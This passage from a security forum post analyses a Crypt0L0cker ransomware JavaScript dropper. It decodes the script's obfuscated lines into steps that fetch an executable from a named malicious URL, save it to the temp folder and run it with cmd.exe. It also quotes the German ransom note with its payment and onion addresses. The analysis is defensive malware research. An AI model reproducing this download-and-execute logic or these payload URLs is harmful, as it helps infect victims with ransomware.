=> FSO.GetTempName() => creates a random name wit .tmp extension
=> Example : "rad44325.tmp"
=> rad : means "random"
=> + 5 HEX values (0 => 9 and A => F)
welerle0 = rgigawco2[ymizd3 + cvomodu5](rodhyciftanz7 + butujuvf0, rowodhuvaz7 + duvywan3 + ysuxgyxd4 + padypot8 + kagakacke2 + dbelijaco0 + xjuhpivsizi2 + yxyreqqybqu9 + ukizahup4 + lfidmehesjel6 + fxifuskopup2 + ymigig6 + ncaxa3 + atyvxa8 + pyzux5 + cypewi6 + obzezy1 + pbecel1 + egkyrexvovt1 + holjuzmiwgi0 + onywy2 + ekupovyxd2 + mydhamz6 + cpydetselap4 + lwyqodbo5 + lovmo1 + ewhoranritqe0 + eworhafsoqk2 + infuru9 + adtise6 + sjefecor1 + yqasoksahbe6 + ovaphojsi0 + btafdudju2 + pescumpu5 + umehzus2, bwipodjofvo2);

=> it is in reality :

http.open("GET",
"http ://tappingthru2u.com/wp-content/themes/twentyfourteen/functions.exe",
0)

=> We can see the URL used to download the payload (spoil :
Crypt0L0cker Virus)
welerle0 = rgigawco2[exipkezl7 + ytulkycvahl7]();

=> http.send()
=> send the http request

ymnevi2[kidrypni0 + vdemudur2] = zjafoxregaw9;
=> Stream.type = 1 : binary data
=> the way the data received will be "seen" (2 : text data)

jdefamo7 = rgigawco2[ncunridc4 + vgohzy0 + exmatdylju3 + ifxus9 + amtumyj7 + ivwibs4];
=> jdefamo7 = http.ResponseBody
=> the data received from the request. If the request is successful, the data of the file

exede5 = ubytucwu6[ithiqcumi7 + unevsotehs5 + ijecu4 + umavl0 + xfawibboxogj3 + obejnog7 + ibupxylopa1];
=> ScriptFullName : "J:\\ANALISE\\18-11-16 #10\\POSTNORD_1755.js"
=> the path+name of the current script running

welerle0 = ymnevi2[ejiredla7 + ysyfazs0]();
=> Stream.Open()
=> Open the stream object

welerle0 = ymnevi2[enxocqojolv5 + izavoned3 + mkaqaxykco0](jdefamo7);
=>Stream.Write(http.responseBody)
=> Writes in the Stram object the data received

welerle0 = ymnevi2[ezlajvelevny5 + ysuzsibi2 + uhvaj9 + tutobmytvo0 + hivelg1](epygejm8 + pkekzigl8);
=>Stream.SaveToFile(%TEMP% + rad44325.tmp)
=> they have forgotten the "\\" part beeten %TEMP and rad44325.tmp
=> It should has been : C:\\Users\\DardiM\\AppData\\Local\\Temp\\rad44325.tmp :rolleyes:
=> It is : C:\\Users\\DardiM\\AppData\\Local\\Temprad44325.tmp :D

welerle0 = ymnevi2[xwajapyt1 + cepa3 + upewekpuxb3]();
=> Stream.close()
welerle0 = odpijdeby0[ijtutsyttudq4 + pkihfidonpy7](aqloxhe5 + bfylve5 + ajnyti1 + yvfijgeruqno3 + epygejm8 + pkekzigl8, bwipodjofvo2);
=> run("cmd.exe /c C:\Users\DardiM\AppData\Local\Temprad44325.tmp",0)
break;
}

3-2) Conclusion :

From my point of view, there is a mistake in the concatenation part :

Path that should have been used :

C:\Users\\DardiM\AppData\Local\Temp
Path used :

C:\Users\\DardiM\AppData\Local

the Temp part is concatenated with the random name :confused:
=> Payload name : Temprad44325.tmp => should have been rad44325.tmp !?​

URL :

http ://tappingthru2u.com/wp-content/themes/twentyfourteen/functions.exe

Payload :

In my case : Temprad44325.tmp

=> rad : means "random"
=> + 5 HEX values (0 => 9 and A => F)
CryptoLocker ransomware

!!! Wir verschlsseln Ihre Dateien mit Crypt0L0cker Virus !!!
============================================================================
Ihre wichtigen Dateien (einschlielich der an den Netzwerk-Festplatten, USB,etc.): Fotos, Videos, Dokumente, etc. wurden mit Crypt0L0cker Virusverschlsselt. Der einzige Weg, um Ihre Dateien wiederherzustellen, ist an unszu zahlen. Andernfalls wird Ihre Dateien verloren gehen. Zum Wiederherstellen von Dateien mssen Sie bezahlen.Um die Dateien zu ffnen unsere Websitehttp://4w5wihkwyhsav2ha.fineboy.at/rp5ubn Ihre wichtigen Dateien (einschlielich der an den Netzwerk-Festplatten, USB,etc.): Fotos, Videos, Dokumente, etc. wurden mit Crypt0L0cker Virusverschlsselt. Der einzige Weg, um Ihre Dateien wiederherzustellen, ist an unszu zahlen. Andernfalls wird Ihre Dateien verloren gehen. Zum Wiederherstellen von Dateien mssen Sie bezahlen.Um die Dateien zu ffnen unsere Website
http ://4w5wihkwyhsav2ha.fineboy.at/rp5ubn18.php?user_code=24q5g5i&user_pass=5064und folgen Sie den Anweisungen wiederherzustellen.Wenn die Website nicht verfgbar ist, folgen Sie bitte diesen Schritten:1. Herunterladen und TOR-Browser von diesem Link installieren:
https:// www .torproject.org/download/download-easy.html.en2. Nach der Installation der Browser ausgefhrt wird und die Adresse eingeben:
http ://4w5wihkwyhsav2ha.onion/rp5ubn18.php?user_code=24q5g5i&user_pass=50643. Folgen Sie den Anweisungen auf der Website 18.php?user_code=24q5g5i&user_pass=5064und folgen Sie den Anweisungen wiederherzustellen.Wenn die Website nicht verfgbar ist, folgen Sie bitte diesen Schritten:1. Herunterladen und TOR-Browser von diesem Link installieren: https:// www .torproject.org/download/download-easy.html.en2. Nach der Installation der Browser ausgefhrt wird und die Adresse eingeben:
http ://4w5wihkwyhsav2ha.onion/rp5ubn18.php?user_code=24q5g5i&user_pass=50643. Folgen Sie den Anweisungen auf der Website

5/56
Antivirus scan for df7fca2d6725cdc93b20391e2b9b835bfa84e79150ade118008950e78f225f82 at 2016-11-18 11:30:35 UTC - VirusTotal
https://www.hybrid-analysis.com/sam...79150ade118008950e78f225f82?environmentId=100
 
Last edited:

About us

  • MalwareTips is a community-driven platform providing the latest information and resources on malware and cyber threats. Our team of experienced professionals and passionate volunteers work to keep the internet safe and secure. We provide accurate, up-to-date information and strive to build a strong and supportive community dedicated to cybersecurity.

User Menu

Follow us

Follow us on Facebook or Twitter to know first about the latest cybersecurity incidents and malware threats.

Top